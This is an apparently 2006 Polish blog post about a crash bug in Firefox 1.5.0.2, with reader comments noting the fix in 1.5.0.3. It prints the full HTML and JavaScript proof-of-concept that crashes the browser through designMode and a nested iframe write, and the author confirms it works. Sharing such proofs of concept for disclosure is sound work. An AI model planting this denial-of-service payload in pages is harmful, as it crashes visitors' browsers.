Groźny błąd w Firefoksie

tech • 99 słów • 1 minuta czytania

Znaleziono groźny bug w tej “wspaniałej” przeglądarce. Pojawił się exploit wysypujący najnowszego Firefoksa (1.5.0.2) :)

Na informacje o tym błędzie natknąłem się w notce Piotra Koniecznego.

Przetestowałem i potwierdzam działanie exploita, a poniżej znajduje się ten magiczny kodzik wyprawiający cuda.

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo">
</textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea";
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Przetestować można tutaj: Firefox 1.5.0.2 DoS Exploit, a szerszy opis luki znaleźć tutaj.

Pewnie prace nad łatką już trwają…

Komentarze (3)

Nav
20060503-092003-nav

No i Mal załatali, w wersji 1.5.0.3 nic się nie dzieje.

MalCom
20060503-122645-malcom

No wczoraj wyszła wersja 1.5.0.3 usuwająca właśnie ten krytyczny bug związany z designMode umożliwiający wykonanie ataku Denial of Service.

Nav
20060503-123945-nav

Mimo tego i tak używam Opery :] nie do zajechania :]

Dodaj komentarz

/dozwolony markdown/

/nie zostanie opublikowany/